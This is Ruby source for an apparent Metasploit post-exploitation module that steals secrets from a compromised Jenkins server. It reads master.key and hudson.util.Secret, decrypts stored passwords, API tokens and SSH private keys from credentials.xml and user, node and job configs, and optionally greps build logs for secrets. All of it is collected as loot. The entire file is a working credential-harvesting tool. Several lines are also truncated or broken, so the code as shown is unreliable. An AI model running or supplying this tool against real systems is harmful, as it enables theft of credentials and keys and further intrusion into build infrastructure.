require 'nokogiri' require 'base64' require 'digest' require 'openssl' require 'sshkey' class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System def initialize(info = {}) super(update_info( info, 'Name' => 'Jenkins Credential Collector', 'Description' => %q( This module can be used to extract saved Jenkins credentials, user tokens, SSH keys, and secrets. Interesting files will be stored in loot along with combined csv output. ), 'License' => MSF_LICENSE, 'Author' => [ 'thesubtlety' ], 'Platform' => [ 'linux', 'win' ], 'SessionTypes' => [ %w[shell meterpreter] ] )) register_options( ['STORE_LOOT', [false, 'Store files in loot (will simply output file to console if set to false).', true]),'SEARCH_JOBS', [false, 'Search through job history logs for interesting keywords. Increases runtime.', false]) ]) @nodes = [] @creds = [] @ssh_keys = [] @api_tokens = [] end def report_creds(user, pass) return if user.empty? || pass.empty? credential_data = { origin_type: :session, post_reference_name: self.fullname, private_data: pass, private_type: :password, session_id: session_db_id, username: user, workspace_id: myworkspace_id } create_credential(credential_data) end def parse_credentialsxml(file) vprint_status("Parsing credentials.xml...") if exists?(file) f = read_file(file) if datastore['STORE_LOOT'] loot_path = store_loot('credentials.xml', 'text/plain', session, f) vprint_status("File credentials.xml saved to #{loot_path}") end else print_error("Could not read credentials.xml...") end xml_doc = Nokogiri::XML(f) xml_doc.xpath("//com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl").each do |node| username = node.xpath("username").text password = decrypt(node.xpath("password").text) description = node.xpath("description").text print_good("Credentials found - Username: #{username} Password: #{password}") report_creds(username, password) @creds << [username, password, description] end xml_doc.xpath("//com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey").each do |node| cred_id = node.xpath("id").text username = node.xpath("username").text description = node.xpath("description").text passphrase = node.xpath("passphrase").text passphrase = decrypt(passphrase) private_key = node.xpath("//privateKeySource//privateKey").text private_key = decrypt(private_key) if !private_key.match?(/----BEGIN/) print_good("SSH Key found! ID: #{cred_id} Passphrase: #{passphrase || '' } Username: #{username} Description: #{description}") store_loot("ssh-#{cred_id}", 'text/plain', session, private_key, nil, nil) if datastore['STORE_LOOT'] @ssh_keys << [cred_id, description, passphrase, username, private_key] begin k =, passphrase) key =, passphrase: passphrase, comment: cred_id) credential_data = { origin_type: :session, session_id: session_db_id, post_reference_name: self.refname, private_type: :ssh_key, private_data: key.key_object.to_s, username: cred_id, workspace_id: myworkspace_id } create_credential(credential_data) rescue OpenSSL::OpenSSLError => e print_error("Could not save SSH key to creds: #{e.message}") end end end def parse_users(file) f = read_file(file) fname ="\\", "/").split('/')[-2] vprint_status("Parsing user #{fname}...") username = "" api_token = "" xml_doc = Nokogiri::XML(f) xml_doc.xpath("//user").each do |node| username = node.xpath("fullName").text end xml_doc.xpath("//").each do |node| api_token = decrypt(node.xpath("apiToken").text) end print_good("API Token found - Username: #{username} Token: #{api_token}") @api_tokens << [username, api_token] report_creds(username, api_token) store_loot("user-#{fname}", 'text/plain', session, f, nil, nil) if datastore['STORE_LOOT'] end def parse_nodes(file) f = read_file(file) fname ="\\", "/").split('/')[-2] vprint_status("Parsing node #{fname}...") node_name = "" description = "" host = "" port = "" cred_id = "" xml_doc = Nokogiri::XML(f) xml_doc.xpath("//slave").each do |node| node_name = node.xpath("name").text description = node.xpath("description").text end xml_doc.xpath("//launcher").each do |node| host = node.xpath("host").text port = node.xpath("port").text cred_id = node.xpath("credentialsId").text end @nodes << [node_name, host, port, description, cred_id] print_good("Node Info found - Name: #{node_name} Host: #{host} Port: #{port} CredID: #{cred_id}") store_loot("node-#{fname}", 'text/plain', session, f, nil, nil) if datastore['STORE_LOOT'] end def parse_jobs(file) f = read_file(file) fname ="\\", "/").split('/')[-4] vprint_status("Parsing job #{fname}...") username = "" pw = "" job_name = file.split(/\/jobs\/(.*?)\/builds\//)[1] xml_doc = Nokogiri::XML(f) xml_doc.xpath("//hudson.model.PasswordParameterValue").each do |node| username = node.xpath("name").text pw = decrypt(node.xpath("value").text) end @creds << [username, pw, ""] print_good("Job Info found - Job Name: #{job_name} User: #{username} Password: #{pw}") if !pw.blank? store_loot("job-#{fname}", 'text/plain', session, f, nil, nil) if datastore['STORE_LOOT'] end def pretty_print_gathered creds_table = 'Header' => 'Creds', 'Indent' => 1, 'Columns' => [ 'Username', 'Password', 'Description' ] ) @creds.uniq.each { |e| creds_table << e } print_good("\n" + creds_table.to_s) if ! store_loot('all.creds.csv', 'text/plain', session, creds_table.to_csv, nil, nil) if datastore['STORE_LOOT'] api_table = 'Header' => 'API Keys', 'Indent' => 1, 'Columns' => [ 'Username', 'API Tokens' ] ) @api_tokens.uniq.each { |e| api_table << e } print_good("\n" + api_table.to_s) if ! store_loot('all.apitokens.csv', 'text/plain', session, api_table.to_csv, nil, nil) if datastore['STORE_LOOT'] node_table = 'Header' => 'Nodes', 'Indent' => 1, 'Columns' => [ 'Node Name', 'Hostname', 'Port', 'Description', 'Cred Id' ] ) @nodes.uniq.each { |e| node_table << e } print_good("\n" + node_table.to_s) if ! store_loot('all.nodes.csv', 'text/plain', session, node_table.to_csv, nil, nil) if datastore['STORE_LOOT'] @ssh_keys.uniq.each do |e| print_good("SSH Key") print_status(" ID: #{e[0]}") print_status(" Description: #{e[1]}") if !e[1].nil? || !e[1].empty? print_status(" Passphrase: #{e[2]}") if !e[2].nil? || !e[2].empty? print_status(" Username: #{e[3]}") if !e[3].nil? || !e[3].empty? print_status("\n#{e[4]}") end ssh_output = @ssh_keys.each { |e| e.join(",") + "\n\n\n" } store_loot('all.sshkeys', 'text/plain', session, ssh_output, nil, nil) if datastore['STORE_LOOT'] && !ssh_output.empty? end def grep_job_history(path, platform) print_status("Searching through job history for interesting keywords...") case platform when "windows" results = cmd_exec("cmd.exe", "/c findstr /s /i \"secret key token password\" \"#{path}*log\"") when 'nix' results = cmd_exec("/bin/egrep", "-ir \"password|secret|key\" --include log \"#{path}\"") end store_loot('jobhistory.truffles', 'text/plain', session, results, nil, nil) if datastore['STORE_LOOT'] && !results.empty? print_good("Job Log truffles:\n#{results}") if !results.empty? end def find_configs(path, platform) case platform when 'windows' case session.type when 'meterpreter' configs = "" c =, "config.xml", true, -1) \ .concat(, "build.xml", true, -1)) c.each { |f| configs << f["path"] + "\\" + f["name"] + "\n" } else configs = cmd_exec("cmd.exe", "/c dir /b /s \"#{path}\\*config.xml\" \"#{path}\\*build.xml\"") end configs.split("\n").each do |f| case f when /\\users\\/ parse_users(f) when /\\jobs\\/ parse_jobs(f) when /\\nodes\\/ parse_nodes(f) end end when 'nix' configs = cmd_exec("/usr/bin/find", "\"#{path}\" -name config.xml -o -name build.xml") configs.split("\n").each do |f| case f when /\/users\// parse_users(f) when /\/jobs\// parse_jobs(f) when /\/nodes\// parse_nodes(f) end end end end def get_key_material(home, platform) case platform when "windows" master_key_path = "#{home}\\secrets\\master.key" hudson_secret_key_path = "#{home}\\secrets\\hudson.util.Secret" when "nix" master_key_path = "#{home}/secrets/master.key" hudson_secret_key_path = "#{home}/secrets/hudson.util.Secret" end if exists?(master_key_path) && exists?(hudson_secret_key_path) @master_key = read_file(master_key_path).strip @hudson_secret_key = read_file(hudson_secret_key_path).strip if datastore['STORE_LOOT'] loot_path = store_loot('master.key', 'application/octet-stream', session, @master_key) vprint_status("File master.key saved to #{loot_path}") loot_path = store_loot('hudson.util.secret', 'application/octet-stream', session, @hudson_secret_key) vprint_status("File hudson.util.Secret saved to #{loot_path}") end else print_error "Cannot read master.key or hudson.util.Secret..." print_error "Encrypted strings will not be able to be decrypted..." return end end def find_home(platform) print_status("Searching for Jenkins directory... This could take some time...") case platform when "windows" case session.type when 'meterpreter' home =, "secret.key.not-so-secret")[0]["path"] else home = cmd_exec("cmd.exe", "/c dir /b /s c:\*secret.key.not-so-secret", timeout = 120).split("\\")[0..-2].join("\\").strip end when "nix" home = cmd_exec("find", "/ -name 'secret.key.not-so-secret' 2>/dev/null", timeout = 120).split('/')[0..-2].join('/').strip end fail_with(Failure::NotFound, "No Jenkins installation found or readable, exiting...") if !exist?(home) print_status("Found Jenkins installation at #{home}") home end def gathernix home = find_home("nix") get_key_material(home, "nix") parse_credentialsxml(home + '/credentials.xml') find_configs(home, "nix") grep_job_history(home + '/jobs/', "nix") if datastore['SEARCH_JOBS'] pretty_print_gathered end def gatherwin home = find_home("windows") get_key_material(home, "windows") parse_credentialsxml(home + "\\credentials.xml") find_configs(home, "windows") grep_job_history(home + "\\jobs\\", "windows") if datastore['SEARCH_JOBS'] pretty_print_gathered end def run case session.platform when 'linux' gathernix else gatherwin end end def decrypt_key(master_key, hudson_secret_key) # magic = '::::MAGIC::::' hashed_master_key = Digest::SHA256.digest(master_key)[0..15] intermediate ='AES-128-ECB') intermediate.decrypt intermediate.key = hashed_master_key salted_final = intermediate.update(hudson_secret_key) + raise 'no magic key in a' if !salted_final.include?(magic) salted_final[0..15] end def decrypt_v2(encrypted) begin master_key = @master_key hudson_secret_key = @hudson_secret_key key = decrypt_key(master_key, hudson_secret_key) encrypted_text = Base64.decode64(encrypted).bytes iv_length = ((encrypted_text[1] & 0xff) << 24) | ((encrypted_text[2] & 0xff) << 16) | ((encrypted_text[3] & 0xff) << 8) | (encrypted_text[4] & 0xff) data_length = ((encrypted_text[5] & 0xff) << 24) | ((encrypted_text[6] & 0xff) << 16) | ((encrypted_text[7] & 0xff) << 8) | (encrypted_text[8] & 0xff) if encrypted_text.length != (1 + 8 + iv_length + data_length) print_error("Invalid encrypted string: #{encrypted}") end iv = encrypted_text[9..(9 + iv_length)].pack('C*')[0..15] code = encrypted_text[(9 + iv_length)..encrypted_text.length].pack('C*').force_encoding('UTF-8') cipher ='AES-128-CBC') cipher.decrypt cipher.key = key cipher.iv = iv text = cipher.update(code) + text = if text.length == 32 # Assuming token text rescue StandardError => e print_error(e.to_s) return "Could not decrypt string" end end def decrypt_legacy(encrypted) # begin magic = '::::MAGIC::::' master_key = @master_key hudson_secret_key = @hudson_secret_key encrypted = Base64.decode64(encrypted) key = decrypt_key(master_key, hudson_secret_key) cipher ='AES-128-ECB') cipher.decrypt cipher.key = key text = cipher.update(encrypted) + text = text[0..(text.length - magic.size - 1)] text = if text.length == 32 # Assuming token text rescue StandardError => e print_error(e.to_s) return "Could not decrypt string" end end def decrypt(encrypted) return if encrypted.empty? if encrypted[0] == "{" && encrypted[-1] == "}" decrypt_v2(encrypted) else decrypt_legacy(encrypted) end end end